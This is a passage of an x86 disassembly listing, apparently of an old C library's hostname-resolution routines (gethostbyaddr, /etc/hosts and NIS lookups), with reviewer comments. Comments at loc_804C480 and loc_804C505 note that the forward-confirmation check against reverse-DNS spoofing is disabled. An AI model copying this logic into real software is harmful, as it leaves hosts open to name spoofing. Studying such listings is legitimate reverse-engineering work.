        push offset aResolv ; "resolv"
        call sub_80552B0
        mov ecx, [ebp+arg_0]
        movzx eax, byte ptr [ecx+3]
        push eax
        movzx eax, byte ptr [ecx+2]
        push eax
        movzx eax, byte ptr [ecx+1]
        push eax
        movzx eax, byte ptr [ecx]
        push eax
        mov eax, [edi]
        push eax
        push offset aGethostbyaddrS ; "gethostbyaddr: %s != %u.%u.%u.%u, possi"...
        push 10h
        push 0Bh
        mov eax, dword_8078F9C
        push eax
        call catgets
        add esp, 10h
        push eax
        push 5
        call sub_8054EB0
        jmp loc_804C526
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C480: ; CODE XREF: gethostbyaddr+11Ej
        ; Check disabled: fill in type, length and the caller's address and
        ; return the name exactly as the reverse answer supplied it.
        mov ecx, [ebp+arg_8]
        mov [edi+8], ecx
        mov ecx, [ebp+arg_4]
        mov [edi+0Ch], ecx
        mov ds:dword_8079DE4, offset dword_807A318
        mov ds:dword_8079DE8, 0
        mov ecx, [ebp+arg_0]
        mov eax, [ecx]
        mov ds:dword_807A318, eax
loc_804C4AA: ; CODE XREF: gethostbyaddr+1D9j
        ; Success for service 1; trim_domains' return value is returned.
        mov ds:dword_807E788, 0
        push edi
        call trim_domains
        jmp short loc_804C528
; ---------------------------------------------------------------------------
loc_804C4BC: ; CODE XREF: gethostbyaddr+76j
        ; Service 2: sub_804CB94(arg_0, arg_4, arg_8).
        mov ecx, [ebp+arg_8]
        push ecx
        mov ecx, [ebp+arg_4]
        push ecx
        mov ecx, [ebp+arg_0]
        push ecx
        call sub_804CB94
        mov edi, eax
        add esp, 0Ch
        jmp short loc_804C505
; ---------------------------------------------------------------------------
loc_804C4D4: ; CODE XREF: gethostbyaddr+8Bj
        ; Service 3: format the address in natural order and query
        ; _getnishost(string, "hosts.byaddr").
        mov ecx, [ebp+arg_0]
        movzx eax, byte ptr [ecx+3]
        push eax
        movzx eax, byte ptr [ecx+2]
        push eax
        movzx eax, byte ptr [ecx+1]
        push eax
        movzx eax, byte ptr [ecx]
        push eax
        push offset aU_U_U_U_0 ; "%u.%u.%u.%u"
        push ebx
        call sprintf
        push offset aHosts_byaddr ; "hosts.byaddr"
        push ebx
        call _getnishost
        mov edi, eax
        add esp, 20h
loc_804C505: ; CODE XREF: gethostbyaddr+29Ej
        ; Services 2 and 3 return their entry with no forward-confirmation check.
        test edi, edi
        jnz loc_804C258
loc_804C50D: ; CODE XREF: gethostbyaddr+111j
        mov ds:dword_807E788, 1
loc_804C517: ; CODE XREF: gethostbyaddr+83j ; gethostbyaddr+91j ...
        ; Try the next configured service.
        inc esi
        cmp ds:dword_8079DD4[esi*4], 0
        jnz loc_804C2A0
loc_804C526: ; CODE XREF: gethostbyaddr+1Cj ; gethostbyaddr+54j ...
; Tail of gethostbyaddr: body of loc_804C526 (failure return), whose label
; immediately precedes this point in the listing.
        xor eax, eax
loc_804C528: ; CODE XREF: gethostbyaddr+30j ; gethostbyaddr+286j
        lea esp, [ebp+var_614]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
gethostbyaddr endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; =============== S U B R O U T I N E =======================================
; sub_804C538(arg_0 = flag)
; Opens "/etc/hosts" for reading if the shared stream dword_8078508 is not
; open yet; otherwise passes the open stream to sub_8054DB8 (presumably a
; rewind - confirm). arg_0 is then OR-ed into dword_807850C, which sub_804C574
; treats as "keep the file open".
; The fopen result is not checked here. Pushed arguments are not popped
; explicitly; "mov esp, ebp" discards them.
; NOTE(review): behaves like a sethostent-style helper.
; Attributes: bp-based frame hidden
sub_804C538 proc near ; CODE XREF: _gethtbyname+7Fp ; sub_804CB94+Ep
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        cmp dword_8078508, 0
        jnz short loc_804C55C
        push offset aR ; "r"
        push offset aEtcHosts ; "/etc/hosts"
        call fopen
        mov dword_8078508, eax
        jmp short loc_804C567
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C55C: ; CODE XREF: sub_804C538+Aj
        mov eax, dword_8078508
        push eax
        call sub_8054DB8
loc_804C567: ; CODE XREF: sub_804C538+20j
        mov edx, [ebp+arg_0]
        or dword_807850C, edx
        mov esp, ebp
        pop ebp
        retn
sub_804C538 endp
; =============== S U B R O U T I N E =======================================
; sub_804C574()
; Closes the shared "/etc/hosts" stream (dword_8078508) and clears the
; pointer, but only when the stream is open and the keep-open flag
; dword_807850C is zero.
; NOTE(review): behaves like an endhostent-style helper.
; Attributes: bp-based frame hidden
sub_804C574 proc near ; CODE XREF: _gethtbyname+1DCp ; _gethtbyname+1F4p ...
        push ebp
        mov ebp, esp
        cmp dword_8078508, 0
        jz short loc_804C59E
        cmp dword_807850C, 0
        jnz short loc_804C59E
        mov eax, dword_8078508
        push eax
        call fclose
        mov dword_8078508, 0
loc_804C59E: ; CODE XREF: sub_804C574+Aj ; sub_804C574+13j
        mov esp, ebp
        pop ebp
        retn
sub_804C574 endp
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; =============== S U B R O U T I N E =======================================
; sub_804C5A4()
; Reads the next usable line of "/etc/hosts" (opening the file on first use)
; and returns offset dword_8079E74 filled from it, or 0 with dword_807E788
; set to 0FFFFFFFFh (file cannot be opened) or 1 (no more lines).
; The line-parsing body follows the loc_804C5E0 label below.
; Attributes: bp-based frame hidden
sub_804C5A4 proc near ; CODE XREF: sub_804BEB0+44p ; _gethtbyname+8Cp ...
var_8 = byte ptr -8
        push ebp
        mov ebp, esp
        push esi
        push ebx
        cmp dword_8078508, 0
        jnz short loc_804C5E0
        push offset aR ; "r"
        push offset aEtcHosts ; "/etc/hosts"
        call fopen
        mov dword_8078508, eax
        add esp, 8
        test eax, eax
        jnz short loc_804C5E0
        mov ds:dword_807E788, 0FFFFFFFFh
        xor eax, eax
        jmp loc_804C6F3
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C5E0: ; CODE XREF: sub_804C5A4+Cj ; sub_804C5A4+27j ...
mov eax, dword_8078508 push eax push 400h push offset unk_8079F14 call fgets mov esi, eax add esp, 0Ch test esi, esi jnz short loc_804C610 mov ds:dword_807E788, 1 xor eax, eax jmp loc_804C6F3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804C610: ; CODE XREF: sub_804C5A4+58j cmp byte ptr [esi], 23h jz short loc_804C5E0 push offset asc_8067BFB ; "#\n" push esi call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804C5E0 mov byte ptr [ebx], 0 push offset asc_806791B ; " \t" push esi call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804C5E0 mov byte ptr [ebx], 0 inc ebx mov ds:dword_8079E84, offset dword_807A340 mov ds:dword_807A340, offset unk_807A31C push esi call inet_addr mov edx, eax mov eax, ds:dword_8079E84 mov eax, [eax] mov [eax], edx mov ds:dword_8079E80, 4 mov ds:dword_8079E7C, 2 add esp, 4 jmp short loc_804C685 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C684: ; CODE XREF: sub_804C5A4+E4j ; sub_804C5A4+E9j inc ebx loc_804C685: ; CODE XREF: sub_804C5A4+DCj cmp byte ptr [ebx], 20h jz short loc_804C684 cmp byte ptr [ebx], 9 jz short loc_804C684 mov ds:dword_8079E74, ebx mov ds:dword_8079E78, offset dword_8079E88 mov esi, offset dword_8079E88 jmp short loc_804C6C4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C6A8: ; CODE XREF: sub_804C5A4+138j cmp byte ptr [ebx], 0 jz short loc_804C6DE cmp byte ptr [ebx], 20h jz short loc_804C6DB cmp byte ptr [ebx], 9 jz short loc_804C6DB cmp esi, offset unk_8079F10 jnb short loc_804C6C4 mov [esi], ebx add esi, 4 loc_804C6C4: ; CODE XREF: sub_804C5A4+100j ; sub_804C5A4+119j push offset asc_806791B ; " \t" push ebx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804C6DE mov byte ptr [ebx], 0 loc_804C6DB: ; CODE XREF: sub_804C5A4+10Cj ; sub_804C5A4+111j inc ebx jnz short loc_804C6A8 loc_804C6DE: ; CODE XREF: sub_804C5A4+107j ; sub_804C5A4+132j mov dword ptr [esi], 0 mov 
ds:dword_807E788, 0 mov eax, offset dword_8079E74 loc_804C6F3: ; CODE XREF: sub_804C5A4+35j ; sub_804C5A4+66j lea esp, [ebp+var_8] pop ebx pop esi mov esp, ebp pop ebp retn sub_804C5A4 endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden _gethtbyname proc near ; CODE XREF: gethostbyname+1CFp ; gethostbyname+1E8p var_84 = byte ptr -84h var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = byte ptr -40h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 78h push edi push esi push ebx xor edi, edi mov [ebp+var_64], 0 mov [ebp+var_4C], offset dword_8079BB8 mov [ebp+var_50], offset dword_8079C48 mov ds:dword_8079BB8, 0 mov ds:dword_8079C48, 0 mov [ebp+var_54], offset unk_80793B4 mov [ebp+var_58], offset unk_80797B5 mov [ebp+var_5C], 401h mov [ebp+var_60], 401h mov ds:dword_8079CEC, 0 mov ds:dword_8079CF0, 0 mov edx, [ebp+arg_0] push edx push offset unk_8079D78 call strcpy push 40h lea ebx, [ebp+var_40] push ebx call gethostname push 0 call sub_804C538 add esp, 14h mov [ebp+var_68], ebx lea esi, [esi] loc_804C788: ; CODE XREF: _gethtbyname+190j ; _gethtbyname+1D4j call sub_804C5A4 mov esi, eax test esi, esi jz loc_804C8D8 mov ecx, [ebp+arg_0] push ecx mov eax, [esi] push eax call sub_80565F8 add esp, 8 test eax, eax jnz short loc_804C7B0 inc edi jmp short loc_804C7ED ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C7B0: ; CODE XREF: _gethtbyname+ACj mov ebx, [esi+4] cmp dword ptr [ebx], 0 jz short loc_804C7ED loc_804C7B8: ; CODE XREF: _gethtbyname+EFj mov edx, [ebp+arg_0] push edx mov eax, [ebx] push eax call sub_80565F8 add esp, 8 test eax, eax jnz short loc_804C7E5 inc edi mov ecx, [ebp+arg_0] mov ds:dword_8079CEC, 
ecx mov eax, [esi] push eax push offset unk_8079D78 call strcpy add esp, 8 loc_804C7E5: ; CODE XREF: _gethtbyname+CDj add ebx, 4 cmp dword ptr [ebx], 0 jnz short loc_804C7B8 loc_804C7ED: ; CODE XREF: _gethtbyname+AFj ; _gethtbyname+BAj mov edx, [ebp+var_68] push edx mov eax, [esi] push eax call sub_80565F8 add esp, 8 test eax, eax jnz short loc_804C808 inc [ebp+var_64] jmp short loc_804C82E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C808: ; CODE XREF: _gethtbyname+102j mov ebx, [esi+4] cmp dword ptr [ebx], 0 jz short loc_804C82E loc_804C810: ; CODE XREF: _gethtbyname+130j mov ecx, [ebp+var_68] push ecx mov eax, [ebx] push eax call sub_80565F8 add esp, 8 test eax, eax jnz short loc_804C826 inc [ebp+var_64] loc_804C826: ; CODE XREF: _gethtbyname+125j add ebx, 4 cmp dword ptr [ebx], 0 jnz short loc_804C810 loc_804C82E: ; CODE XREF: _gethtbyname+107j ; _gethtbyname+112j test edi, edi jz short loc_804C888 cmp dword_8078510, 0 jz loc_804C8F0 mov ebx, [esi+0Ch] mov eax, [esi+8] mov ds:dword_8079CE0, eax mov eax, [esi+0Ch] mov ds:dword_8079CE4, eax cmp [ebp+var_5C], ebx jl short loc_804C886 push ebx mov edx, [ebp+var_54] push edx mov eax, [esi+10h] mov eax, [eax] push eax call bcopy mov edx, [ebp+var_54] mov ecx, [ebp+var_4C] mov [ecx], edx add ecx, 4 mov [ebp+var_4C], ecx mov dword ptr [ecx], 0 add edx, ebx mov [ebp+var_54], edx sub [ebp+var_5C], ebx add esp, 0Ch loc_804C886: ; CODE XREF: _gethtbyname+159j xor edi, edi loc_804C888: ; CODE XREF: _gethtbyname+134j cmp [ebp+var_64], 0 jz loc_804C788 mov ebx, [esi+0Ch] cmp [ebp+var_60], ebx jl short loc_804C8C9 push ebx mov ecx, [ebp+var_58] push ecx mov eax, [esi+10h] mov eax, [eax] push eax call bcopy mov ecx, [ebp+var_58] mov edx, [ebp+var_50] mov [edx], ecx add edx, 4 mov [ebp+var_50], edx mov dword ptr [edx], 0 add ecx, ebx mov [ebp+var_58], ecx sub [ebp+var_60], ebx add esp, 0Ch loc_804C8C9: ; CODE XREF: _gethtbyname+19Cj mov [ebp+var_64], 0 jmp loc_804C788 ; 
陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C8D8: ; CODE XREF: _gethtbyname+95j call sub_804C574 cmp ds:dword_8079BB8, 0 jnz short loc_804C8FC xor eax, eax jmp loc_804C9D4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C8F0: ; CODE XREF: _gethtbyname+13Dj call sub_804C574 mov eax, esi jmp loc_804C9D4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804C8FC: ; CODE XREF: _gethtbyname+1E8j mov ds:dword_8079CDC, offset dword_8079CEC mov ds:dword_8079CD8, offset unk_8079D78 mov [ebp+var_6C], 0 mov [ebp+var_70], 0FFFFFFFFh cmp ds:dword_8079C48, 0 jz short loc_804C9A3 mov [ebp+var_74], offset dword_8079C48 lea esi, [esi] loc_804C930: ; CODE XREF: _gethtbyname+2A5j xor edi, edi cmp ds:dword_8079BB8, 0 jz short loc_804C997 mov esi, offset dword_8079BB8 loc_804C940: ; CODE XREF: _gethtbyname+299j mov eax, ds:dword_8079CE4 push eax lea eax, [ebp+var_44] push eax mov edx, [ebp+var_74] mov eax, [edx] push eax call bcopy add esp, 0Ch mov eax, [ebp+var_44] mov ebx, eax xchg bl, bh ror ebx, 10h xchg bl, bh mov eax, ds:dword_8079CE4 push eax lea eax, [ebp+var_48] push eax mov eax, [esi] push eax call bcopy mov eax, ebx xor eax, [ebp+var_48] mov [ebp+var_44], eax add esp, 0Ch mov ecx, [ebp+var_70] cmp eax, ecx jnb short loc_804C98E mov [ebp+var_6C], edi mov [ebp+var_70], eax loc_804C98E: ; CODE XREF: _gethtbyname+28Aj add esi, 4 inc edi cmp dword ptr [esi], 0 jnz short loc_804C940 loc_804C997: ; CODE XREF: _gethtbyname+23Dj add [ebp+var_74], 4 mov edx, [ebp+var_74] cmp dword ptr [edx], 0 jnz short loc_804C930 loc_804C9A3: ; CODE XREF: _gethtbyname+229j cmp [ebp+var_6C], 0 jz short loc_804C9C5 mov ecx, ds:dword_8079BB8 mov edx, [ebp+var_6C] mov eax, ds:dword_8079BB8[edx*4] mov ds:dword_8079BB8, eax mov ds:dword_8079BB8[edx*4], ecx loc_804C9C5: ; CODE XREF: _gethtbyname+2ABj mov ds:dword_8079CE8, offset dword_8079BB8 mov eax, offset dword_8079CD8 loc_804C9D4: ; CODE XREF: 
_gethtbyname+1ECj ; _gethtbyname+1FBj lea esp, [ebp+var_84] pop ebx pop esi pop edi mov esp, ebp pop ebp retn _gethtbyname endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden _getnishost proc near ; CODE XREF: sub_804BEB0+73p ; gethostbyname+234p ... var_14 = byte ptr -14h var_8 = byte ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 8 push edi push esi push ebx mov ebx, [ebp+arg_0] mov esi, [ebp+arg_4] cmp dword_807852C, 0 jnz short loc_804CA11 push offset dword_807852C call sub_805D5F8 add esp, 4 test eax, eax jnz loc_804CAB1 loc_804CA11: ; CODE XREF: _getnishost+16j test ebx, ebx jz short loc_804CA44 lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax xor al, al mov edi, ebx cld mov ecx, 0FFFFFFFFh repne scasb mov eax, ecx not eax dec eax push eax push ebx push esi mov eax, dword_807852C push eax call sub_805D3A8 add esp, 18h jmp short loc_804CAAD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CA44: ; CODE XREF: _getnishost+2Fj cmp dword_8078528, 0 jz short loc_804CA80 lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push offset dword_8079DD0 push offset dword_8079DCC push esi mov eax, dword_807852C push eax call sub_805D638 add esp, 18h test eax, eax jnz short loc_804CAB1 mov dword_8078528, 0 jmp short loc_804CAB8 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CA80: ; CODE XREF: _getnishost+67j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push offset dword_8079DD0 push offset dword_8079DCC mov eax, ds:dword_8079DD0 push eax mov eax, ds:dword_8079DCC push eax push esi mov eax, dword_807852C push eax call sub_805D814 add esp, 20h loc_804CAAD: ; CODE XREF: _getnishost+5Bj test eax, eax jz short loc_804CAB8 loc_804CAB1: ; CODE XREF: _getnishost+27j ; _getnishost+8Cj xor eax, eax jmp 
loc_804CB89 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CAB8: ; CODE XREF: _getnishost+98j ; _getnishost+CBj push 0Ah mov eax, [ebp+var_4] push eax call strchr mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804CACF mov byte ptr [ebx], 0 loc_804CACF: ; CODE XREF: _getnishost+E6j push offset asc_806791B ; " \t" mov eax, [ebp+var_4] push eax call strpbrk mov ebx, eax mov byte ptr [ebx], 0 inc ebx mov ds:dword_8079DC8, offset dword_807A340 mov ds:dword_807A340, offset unk_807A31C mov eax, [ebp+var_4] push eax call inet_addr mov edx, eax mov eax, ds:dword_8079DC8 mov eax, [eax] mov [eax], edx mov ds:dword_8079DC4, 4 mov ds:dword_8079DC0, 2 add esp, 0Ch jmp short loc_804CB25 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CB24: ; CODE XREF: _getnishost+144j ; _getnishost+149j inc ebx loc_804CB25: ; CODE XREF: _getnishost+13Ej cmp byte ptr [ebx], 20h jz short loc_804CB24 cmp byte ptr [ebx], 9 jz short loc_804CB24 mov ds:dword_8079DB8, ebx mov ds:dword_8079DBC, offset dword_8079E88 mov edi, offset dword_8079E88 jmp short loc_804CB64 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CB48: ; CODE XREF: _getnishost+198j cmp byte ptr [ebx], 0 jz short loc_804CB7E cmp byte ptr [ebx], 20h jz short loc_804CB7B cmp byte ptr [ebx], 9 jz short loc_804CB7B cmp edi, offset unk_8079F10 jnb short loc_804CB64 mov [edi], ebx add edi, 4 loc_804CB64: ; CODE XREF: _getnishost+160j ; _getnishost+179j push offset asc_806791B ; " \t" push ebx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804CB7E mov byte ptr [ebx], 0 loc_804CB7B: ; CODE XREF: _getnishost+16Cj ; _getnishost+171j inc ebx jnz short loc_804CB48 loc_804CB7E: ; CODE XREF: _getnishost+167j ; _getnishost+192j mov dword ptr [edi], 0 mov eax, offset dword_8079DB8 loc_804CB89: ; CODE XREF: _getnishost+CFj lea esp, [ebp+var_14] pop ebx pop esi pop edi mov esp, ebp pop ebp retn _getnishost endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N 
E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804CB94 proc near ; CODE XREF: gethostbyaddr+294p var_C = byte ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push edi push esi push ebx mov edi, [ebp+arg_4] mov esi, [ebp+arg_8] push 0 call sub_804C538 add esp, 4 lea esi, [esi] loc_804CBAC: ; CODE XREF: sub_804CB94+26j ; sub_804CB94+3Dj call sub_804C5A4 mov ebx, eax test ebx, ebx jz short loc_804CBD3 cmp [ebx+8], esi jnz short loc_804CBAC push edi mov edx, [ebp+arg_0] push edx mov eax, [ebx+10h] mov eax, [eax] push eax call sub_8056450 add esp, 0Ch test eax, eax jnz short loc_804CBAC loc_804CBD3: ; CODE XREF: sub_804CB94+21j call sub_804C574 mov eax, ebx lea esp, [ebp+var_C] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804CB94 endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804CBE4 proc near ; CODE XREF: getanswer+65Fp var_6C = byte ptr -6Ch var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = word ptr -48h var_46 = byte ptr -46h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 60h push edi push esi push ebx mov [ebp+var_50], 0 mov edx, [ebp+arg_0] mov [ebp+var_4C], edx mov [ebp+var_5C], 0 mov edi, [ebp+arg_4] cmp [ebp+var_50], edi jge loc_804CD5C test edi, 1 jz short loc_804CC80 xor ecx, ecx mov al, byte_80786A8 shr al, 4 and eax, 0FFh cmp [ebp+var_50], eax jge short loc_804CC56 mov esi, [edx] mov ebx, eax mov [ebp+var_60], 0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804CC38: ; CODE XREF: sub_804CBE4+70j mov eax, [esi] mov edx, [ebp+var_60] and eax, dword ptr unk_80786B0[edx] cmp dword ptr unk_80786AC[edx], eax jz short loc_804CC56 add edx, 8 mov [ebp+var_60], edx inc ecx cmp ecx, ebx jl short loc_804CC38 loc_804CC56: ; CODE XREF: sub_804CBE4+44j ; sub_804CBE4+65j mov edi, [ebp+var_5C] mov [ebp+edi*2+var_48], cx cmp [ebp+var_50], 0 
jnz short loc_804CC74 test edi, edi jle short loc_804CC74 movsx eax, word ptr [ebp+edi*2+var_4C+2] cmp ecx, eax jge short loc_804CC74 mov [ebp+var_50], edi loc_804CC74: ; CODE XREF: sub_804CBE4+7Ej ; sub_804CBE4+82j ... inc [ebp+var_5C] add [ebp+var_4C], 4 jmp loc_804CD50 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CC80: ; CODE XREF: sub_804CBE4+2Fj ; sub_804CBE4+172j xor ecx, ecx mov al, byte_80786A8 shr al, 4 and eax, 0FFh cmp ecx, eax jge short loc_804CCC2 mov edi, [ebp+var_4C] mov esi, [edi] mov ebx, eax mov [ebp+var_60], 0 lea esi, [esi] loc_804CCA4: ; CODE XREF: sub_804CBE4+DCj mov eax, [esi] mov edx, [ebp+var_60] and eax, dword ptr unk_80786B0[edx] cmp dword ptr unk_80786AC[edx], eax jz short loc_804CCC2 add edx, 8 mov [ebp+var_60], edx inc ecx cmp ecx, ebx jl short loc_804CCA4 loc_804CCC2: ; CODE XREF: sub_804CBE4+AEj ; sub_804CBE4+D1j mov edi, [ebp+var_5C] mov [ebp+edi*2+var_48], cx cmp [ebp+var_50], 0 jnz short loc_804CCE0 test edi, edi jle short loc_804CCE0 movsx eax, word ptr [ebp+edi*2+var_4C+2] cmp ecx, eax jge short loc_804CCE0 mov [ebp+var_50], edi loc_804CCE0: ; CODE XREF: sub_804CBE4+EAj ; sub_804CBE4+EEj ... mov esi, [ebp+var_5C] inc esi xor ecx, ecx mov al, byte_80786A8 shr al, 4 and eax, 0FFh cmp ecx, eax jge short loc_804CD2D mov edx, [ebp+var_4C] mov edx, [edx+4] mov [ebp+var_58], edx mov ebx, eax mov [ebp+var_60], 0 lea esi, [esi] loc_804CD0C: ; CODE XREF: sub_804CBE4+147j mov edi, [ebp+var_58] mov eax, [edi] mov edi, [ebp+var_60] and eax, dword ptr unk_80786B0[edi] cmp dword ptr unk_80786AC[edi], eax jz short loc_804CD2D add edi, 8 mov [ebp+var_60], edi inc ecx cmp ecx, ebx jl short loc_804CD0C loc_804CD2D: ; CODE XREF: sub_804CBE4+112j ; sub_804CBE4+13Cj mov [ebp+esi*2+var_48], cx cmp [ebp+var_50], 0 jnz short loc_804CD48 test esi, esi jle short loc_804CD48 movsx eax, word ptr [ebp+esi*2+var_4C+2] cmp ecx, eax jge short loc_804CD48 mov [ebp+var_50], esi loc_804CD48: ; CODE XREF: sub_804CBE4+152j ; sub_804CBE4+156j ... 
add [ebp+var_5C], 2 add [ebp+var_4C], 8 loc_804CD50: ; CODE XREF: sub_804CBE4+97j mov edx, [ebp+arg_4] cmp [ebp+var_5C], edx jl loc_804CC80 loc_804CD5C: ; CODE XREF: sub_804CBE4+23j cmp [ebp+var_50], 0 jz loc_804CE7F mov edi, [ebp+arg_4] cmp [ebp+var_50], edi jge loc_804CE7F lea edx, [ebp+var_46] mov [ebp+var_54], edx mov eax, edi sub eax, [ebp+var_50] test al, 1 jz short loc_804CDD8 mov ecx, [ebp+var_50] dec ecx js short loc_804CDC7 mov edi, [ebp+arg_0] lea esi, [edi+ecx*4] lea ebx, [edx+ecx*2] loc_804CD90: ; CODE XREF: sub_804CBE4+1E1j mov ax, [ebp+ecx*2+var_48] cmp [ebx], ax jge short loc_804CDC7 movsx edx, ax mov [ebp+var_5C], edx mov ax, [ebx] mov [ebp+ecx*2+var_48], ax mov di, word ptr [ebp+var_5C] mov [ebx], di mov edx, [esi] mov edi, [ebp+arg_0] mov eax, [edi+ecx*4+4] mov [esi], eax mov [edi+ecx*4+4], edx add esi, 0FFFFFFFCh add ebx, 0FFFFFFFEh dec ecx jns short loc_804CD90 loc_804CDC7: ; CODE XREF: sub_804CBE4+1A1j ; sub_804CBE4+1B4j inc [ebp+var_50] mov edx, [ebp+arg_4] cmp [ebp+var_50], edx jge loc_804CE7F lea esi, [esi] loc_804CDD8: ; CODE XREF: sub_804CBE4+19Bj ; sub_804CBE4+295j mov ecx, [ebp+var_50] dec ecx js short loc_804CE23 mov edi, [ebp+arg_0] 